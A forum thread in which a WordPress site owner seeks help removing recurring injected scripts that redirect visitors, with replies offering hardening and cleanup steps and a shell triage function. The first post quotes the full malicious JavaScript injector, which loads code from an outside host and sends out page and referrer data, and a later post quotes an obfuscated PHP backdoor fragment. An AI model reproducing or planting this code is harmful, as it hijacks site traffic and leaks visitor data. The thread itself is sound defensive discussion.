Scripts inserted in my WP themes header
Somehow some scripts are placed in my theme header that contain malware and redirect traffic to other sites.
I changed themes 3 times and got hosting to scan for the malware, which they did and deleted it, but it happens every day. It points to different sites. Some were adult dating sites. Below is a sample. How can I get rid of these things? It has cost me money to fix some stuff and I also lost over half of my traffic.
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b ))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script> |
Quote:
Without accusing any company, you should look into this too. |
I would suggest:
Check out these links on making Wordpress more secure: https://codex.wordpress.org/Hardening_WordPress Securing WordPress: Hardening Basics | The State of Security https://www.wordfence.com/learn/how-...rdpress-sites/ |
Thanks. Everything started when I used an ad network's script months ago, then stopped, then cleaned the whole site, but it has been returning many many times.
All plugins are from the WP repository. The problem is that the issue happens every day or every two days, so running without a plug in per day test may end like next year and still it may harm the website. The 3 admins are me and the developers I had to hire to fix the issue. No one else has logged in to the site as admin in the past weeks. Is there a way to block scripts? |
Can you check your Jetpack stats and tell me if you see outbound clicks going to a URL like this: 01.wp.com etc... if anything looks similar?
Many think those are legit outbound but THEY ARE NOT. :) I mean we have discovered hacked files with the above URL or similar. Also check the webmaster tools USER owner property, if anyone new has been added as owner. Been hacked this way before. |
Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid.. :winkwink:
|
Quote:
At this point if your tech can't fix it try another one mate. Or worst case change Theme. :thumbsup Good Luck and keep us posted :) |
Quote:
Try removing the script, then change your cPanel and WP passwords, "harden" WP if you know how, remove plugins and themes that you don't use anymore, make sure file permissions are set right, see if there are any weird fake files added like jquery.min.php or .ftpquote, check uploads folder for things that don't belong, and sometimes people with this issue have resolved it with something called Sucuri. Hope this helps. |
Colmike your link is VIrusssssssssssss
DON'T CLICK THIS LINK, see below why: https://s16.postimg.org/qz1f1s991/Untitled.jpg |
ok thanks.. will let you know if something of this works out
|
We used to have exactly same thing. Even managed to track down the fucking russian down to his home address.
We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe. They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server. |
If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.
|
That's what you get not keeping software up to date, op.
|
You probably already have tried some malware plugins - but if you haven't tried this one I would give it a go: https://wordpress.org/plugins/gotmls/
|
Thanks guys and thanks for the recommendations.
As I am not tech savvy and the person helping me is MIA, I tried to find the issue myself. What is the dirs.php file supposed to do? I think that is one of the issues. It has crap like this one:
${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content))); |
What does it mean when Wordfence tells you that somebody came to your site and tried to access a non-existent page? The non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png |
Quote:
If you found that file on the root directory of your Wordpress install, and you're sure that all your plugins are safe, then it is highly likely access to your server has been compromised. I would suggest trying this, in this order:
If the script issue persists after all that, then your problem is as serious as Google Expert's because infected files are hidden somewhere else in your server. |
Quote:
There are others, too, like if you see a bunch of random.com/something/feed showing up then that's a bot looking for content to scrape. |
Quote:
I would search "fonts/fontawesome-webfont.woff2 found" or "themes/redwave-lite/fonts/fontawesome-webfont.woff?version=4.3.0" if you want to fix this error. You may want to look for your hack though. Are you on shared hosting? Can you find when your file is getting changed? Maybe check the site log for when the hacked file is getting updated. Did you change your FTP password like Fetish Gimp mentioned? Did you change your WordPress password? I like to rename wp-login.php to something else and change it back only when I need to make an update. I don't think this will help you, but may be worth a try. |
ravenazrael, you are in for a big surprise. This shit has been hitting my sites for months, it's no easy cleanup. Sometimes they can make your sites appear to be normal while stealing all your Google traffic too.
https://aw-snap.info/file-viewer/ I found this online website scanning tool very helpful. This is a terrible, terrible thing :( Good luck getting it fixed. |
Thanks to everybody!
Yes, it has been hitting me for months and it looked normal for a while. My traffic has gone to 1/3 now. |
Quote:
I have my part of the problem also, moving server is a Bitch.... Hitting my head on my desk for the last 72 hours :mad: grrrrr. At least you know where the problem comes from, I suggest you TAKE Big action to wipe it out. |
Quote:
One thing you might wanna do is to search your Wordpress database(s) for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected, just in case they've been saved into the database so that whenever Wordpress runs, they get put back in. |
seems it is finally solved. thanks to you all!
|
oh it's never solved :(
|
so how did you fix it ? :)
|
They may likely have made many backdoor shells. Best bet is to format, then import only posts from old database on fresh install.
|
Back up only post content and images. nothing else. Then do a clean install. Most likely you got that code when you 'tried' one of those nulled plugins from blackhat forums or let one of those bargain freelancers work on your site.
|
Quote:
You need to format the HDD and do a clean OS install. Other than this, nothing will help. |
Quote:
I actually never downloaded any plugin or script from BHW. I remember it all started when I inserted a script from a well-known ad network. Not sure if it triggered it or was coincidence. |
Basics....
https://ithemes.com/2016/10/13/how-t...ly-and-easily/ Good plugin... https://wordpress.org/plugins/all-in...-and-firewall/ If that doesn't do it could route DNS through Incapsula to kill off some bad shit before it even gets to your server. CloudFlare more popular and a good CDN but in terms of security Incapsula's free plan blocks more bad shit out than CloudFlare's paid plan. :2 cents: |
It is possible to clean out a hacked Wordpress setup and indeed I have done it.
One thing that may help you is this:
find /pathtoyourfiles/yourblog.com -mtime -2 -ls
It will list all of the files that have been modified in the past two days, which is very helpful in catching backdoor shell scripts and files being placed on your server. If the attacker is using your site to send spam emails it's easy to find the originating script from the email header. Then you can delete it and also search in your logs for other scripts being used to send email. Usually the attacker will have three systems going, one is the actual backdoor that allows him to place files on your server, the other are the scripts that they use to send spam emails, and the other is a page on your website that acts as an endpoint for the URLs in his spam emails. This is the classic attack these days and once you can wrap your head around what they are trying to do it's a lot easier to prevent it. It can also help if you use something like wordfence which will catch some but not all of the problems. Also keep your plugins up to date and delete any old plugins and themes. |
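Added example, not part of the original post or any poster's own code: a POSIX shell triage function that combines the `find -mtime` check above with a search for strings from the injected script quoted in the first post, PHP files in the uploads folder, and the fake file names reported in this thread. The function name `scan_wp_tree` and the output tags are made up for this example.

```sh
#!/bin/sh
# Added example: triage a WordPress tree for the symptoms described in this thread.
# MARKERS are strings from the injected script quoted in the first post;
# extend the pattern for other infections.
MARKERS='__cfgoid|jquery\.min\.php'

# scan_wp_tree DIR [DAYS]  (hypothetical helper name)
# Prints one finding per line as "TAG path":
#   RECENT   .php/.js/.htaccess file modified within DAYS days (default 2)
#   MARKER   file containing one of the MARKERS strings
#   UPLOADS  PHP file under wp-content/uploads, which should hold media only
#   NAME     file named like the fake files reported in this thread
scan_wp_tree() {
    root=$1
    days=${2:-2}
    [ -d "$root" ] || { echo "not a directory: $root" >&2; return 2; }

    find "$root" -type f \
        \( -name '*.php' -o -name '*.js' -o -name '.htaccess' \) \
        -mtime "-$days" | sed 's/^/RECENT /'

    # -r is not POSIX but is supported by GNU, BSD and busybox grep.
    grep -rlE -- "$MARKERS" "$root" 2>/dev/null | sed 's/^/MARKER /'

    find "$root" -type f -path '*/wp-content/uploads/*' -name '*.php' |
        sed 's/^/UPLOADS /'

    find "$root" -type f \
        \( -name 'jquery.min.php' -o -name '.ftpquote' -o -name 'dirs.php' \) |
        sed 's/^/NAME /'

    return 0
}

# Run only when a directory is given on the command line.
if [ "$#" -gt 0 ]; then
    scan_wp_tree "$@"
fi
```

Findings are leads to review against a fresh copy of the theme and plugins, and an empty result does not show the server is clean.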
thank you! I hope all this also helps somebody else who may have similar issues in the future
|
Quote:
We had spent 6 months trying to clean it out from our server. It would always come back. In the end we had to format HD and reinstall OS. P.S. they also try to hide their presence by redirecting certain countries only. So you may be viewing the site and thinking that all is good, while people from other countries are being redirected to his doorway pages. |